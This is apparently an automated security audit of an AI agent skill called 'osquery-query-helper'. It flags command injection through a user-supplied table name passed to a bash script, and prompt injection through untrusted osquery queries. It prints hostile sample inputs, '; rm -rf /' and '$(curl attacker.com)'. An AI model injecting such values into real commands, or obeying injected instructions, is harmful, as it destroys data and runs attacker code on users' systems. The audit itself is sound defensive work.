osquery-query-helper
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions direct the agent to execute bash scripts, such as
bash scripts/extract-table.sh <table_name>, where<table_name>is a string provided by the user. A malicious user could provide a table name containing shell metacharacters like; rm -rf /or$(curl attacker.com)to execute arbitrary commands on the system. - [PROMPT_INJECTION] (HIGH): The agent is tasked with processing and troubleshooting untrusted osquery queries provided by users. The instructions do not define boundary markers to isolate user input from system instructions, which could allow an attacker to override the agent's behavior.
- [INDIRECT_PROMPT_INJECTION] (HIGH): Mandatory Evidence Chain: 1. Ingestion points: User-provided table names and osquery queries enter the agent's context through the prompt. 2. Boundary markers: Absent. There are no instructions to use delimiters like XML tags or backticks to isolate user content. 3. Capability inventory: The skill has the ability to execute
bash,grep, andlscommands and run local scripts. 4. Sanitization: Absent. The workflow lacks any validation or escaping steps for user input before it is passed to shell commands.
Recommendations
- AI detected serious security threats
Audit Metadata